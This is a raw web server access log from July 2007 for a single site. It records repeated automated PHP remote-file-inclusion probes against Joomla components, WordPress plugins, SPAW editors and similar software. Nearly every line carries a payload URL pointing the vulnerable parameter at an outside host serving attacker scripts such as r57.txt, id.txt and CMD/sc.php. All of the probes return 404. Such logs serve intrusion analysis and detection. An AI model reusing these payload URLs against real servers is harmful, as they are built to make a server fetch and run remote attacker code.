200.19.190.150 - - [22/Jul/2007:19:36:11 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:37:19 -0700] "GET /logs/index2.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:37:19 -0700] "GET /index2.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:38:24 -0700] "GET /logs/index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:38:24 -0700] "GET /index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:40:33 -0700] "GET /logs/index2.php?content=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:40:33 -0700] "GET /index2.php?content=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:19:41:29 -0700] "GET /logs/index.php?open=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:41:29 -0700] "GET /index.php?open=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:42:17 -0700] "GET /logs/index.php?pag=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:42:26 -0700] "GET /index.php?pag=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:19:43:58 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:19:43:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:19:44:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:19:44:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.10.128.248 - - [22/Jul/2007:19:46:09 -0700] "GET /logs/index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:46:09 -0700] "GET /index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:19:46:26 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:19:46:26 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.154.246.87 - - [22/Jul/2007:19:46:31 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.154.246.87 - - [22/Jul/2007:19:46:32 -0700] "GET //modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:46:38 -0700] "GET /logs/index2.php?content=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:46:38 -0700] "GET /index2.php?content=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:47:16 -0700] "GET /logs/index2.php?content=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:47:16 -0700] "GET /index2.php?content=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
217.112.41.50 - - [22/Jul/2007:19:47:21 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.112.41.50 - - [22/Jul/2007:19:47:21 -0700] "GET //modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.100.11.27 - - [22/Jul/2007:19:48:25 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
208.100.11.27 - - [22/Jul/2007:19:48:25 -0700] "GET //modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
70.84.7.74 - - [22/Jul/2007:19:48:31 -0700] "GET /logs/index.php?open=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:48:32 -0700] "GET /index.php?open=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:48:45 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:48:45 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:48:50 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:48:50 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.154.246.87 - - [22/Jul/2007:19:48:59 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.154.246.87 - - [22/Jul/2007:19:49:00 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:49:55 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:49:55 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:50:01 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:50:01 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.100.11.27 - - [22/Jul/2007:19:50:46 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
208.100.11.27 - - [22/Jul/2007:19:50:46 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:19:51:48 -0700] "GET /logs/index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:19:51:51 -0700] "GET /index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.112.41.50 - - [22/Jul/2007:19:51:53 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.112.41.50 - - [22/Jul/2007:19:51:53 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.114.133.27 - - [22/Jul/2007:19:52:09 -0700] "GET /logs/template.php?pagina=http://geocities.com/nadira_sekseh/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:52:11 -0700] "GET /template.php?pagina=http://geocities.com/nadira_sekseh/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.128.226 - - [22/Jul/2007:19:52:23 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.128.226 - - [22/Jul/2007:19:52:23 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:52:27 -0700] "GET /logs/index.php?pag=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:52:27 -0700] "GET /index.php?pag=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:53:41 -0700] "GET /logs/index.php?open=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:53:42 -0700] "GET /index.php?open=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:54:36 -0700] "GET /logs/index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:54:36 -0700] "GET /index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:55:28 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.114.133.27 - - [22/Jul/2007:19:55:28 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.112.41.50 - - [22/Jul/2007:19:56:59 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
217.112.41.50 - - [22/Jul/2007:19:56:59 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.154.246.87 - - [22/Jul/2007:19:58:01 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.154.246.87 - - [22/Jul/2007:19:58:01 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.100.11.27 - - [22/Jul/2007:19:58:02 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
208.100.11.27 - - [22/Jul/2007:19:58:02 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
74.6.17.125 - - [22/Jul/2007:19:58:20 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:19:58:45 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:19:58:45 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:59:23 -0700] "GET /logs/index.php?open=http://geocities.com/nadira_sekseh/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:59:23 -0700] "GET /index.php?open=http://geocities.com/nadira_sekseh/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:59:24 -0700] "GET /logs/index.php?include=http://geocities.com/nadira_sekseh/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:59:25 -0700] "GET /index.php?include=http://geocities.com/nadira_sekseh/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.36.230.63 - - [22/Jul/2007:20:01:12 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.36.230.63 - - [22/Jul/2007:20:01:12 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:03:18 -0700] "GET /logs/index.php?action=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:20:03:18 -0700] "GET /index.php?action=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
150.185.222.15 - - [22/Jul/2007:20:04:40 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
150.185.222.15 - - [22/Jul/2007:20:04:40 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.249.190.130 - - [22/Jul/2007:20:16:24 -0700] "GET /logs/access.log HTTP/1.0" 200 114966 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5" "www.galf.org"
200.249.190.130 - - [22/Jul/2007:20:16:28 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:20:18:06 -0700] "GET /logs/index.php?pag=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:20:18:06 -0700] "GET /index.php?pag=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:20:19:42 -0700] "GET /logs/index.php?go=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:20:19:42 -0700] "GET /index.php?go=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:20:21:00 -0700] "GET /logs/index.php?action=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
70.84.7.74 - - [22/Jul/2007:20:21:01 -0700] "GET /index.php?action=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
88.191.39.142 - - [22/Jul/2007:20:21:07 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://evilc0der.com/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:20:22:04 -0700] "GET /logs/index.php?file=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:20:22:04 -0700] "GET /index.php?file=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.184.187.186 - - [22/Jul/2007:20:22:55 -0700] "GET /logs/index.php?go=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
212.184.187.186 - - [22/Jul/2007:20:22:56 -0700] "GET /index.php?go=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:20:26:12 -0700] "GET /index.php?pag=http://chireo.info/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
212.184.187.186 - - [22/Jul/2007:20:26:22 -0700] "GET /logs/index.php?file=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.184.187.186 - - [22/Jul/2007:20:26:23 -0700] "GET /index.php?file=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.43.35.235 - - [22/Jul/2007:20:26:53 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.43.35.235 - - [22/Jul/2007:20:26:57 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:20:30:16 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.222.92.150 - - [22/Jul/2007:20:30:46 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.222.92.150 - - [22/Jul/2007:20:30:50 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:20:31:59 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:20:32:00 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:20:32:34 -0700] "GET /logs/index.php?p=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
141.54.1.11 - - [22/Jul/2007:20:32:34 -0700] "GET /index.php?p=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.184.187.186 - - [22/Jul/2007:20:33:25 -0700] "GET /logs/index.php?pag=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.184.187.186 - - [22/Jul/2007:20:33:26 -0700] "GET /index.php?pag=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:34:08 -0700] "GET /logs/announcements.php?phpraid_dir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:34:08 -0700] "GET /announcements.php?phpraid_dir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:20:34:48 -0700] "GET /logs/index.php?action=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:20:34:50 -0700] "GET /index.php?action=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.222.92.150 - - [22/Jul/2007:20:35:49 -0700] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.222.92.150 - - [22/Jul/2007:20:35:51 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.184.187.186 - - [22/Jul/2007:20:38:33 -0700] "GET /logs/index.php?p=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.184.187.186 - - [22/Jul/2007:20:38:33 -0700] "GET /index.php?p=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:20:42:19 -0700] "GET /logs/index.php?pag=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:20:42:19 -0700] "GET /index.php?pag=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:20:45:23 -0700] "GET /logs/announcements.php?phpraid_dir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:20:45:24 -0700] "GET /announcements.php?phpraid_dir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.43.35.235 - - [22/Jul/2007:20:47:16 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.43.35.235 - - [22/Jul/2007:20:47:17 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.43.35.235 - - [22/Jul/2007:20:48:54 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.43.35.235 - - [22/Jul/2007:20:48:56 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:50:17 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:50:17 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:20:51:40 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:20:51:41 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.43.35.235 - - [22/Jul/2007:20:53:03 -0700] "GET /logs/index.php?inc=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
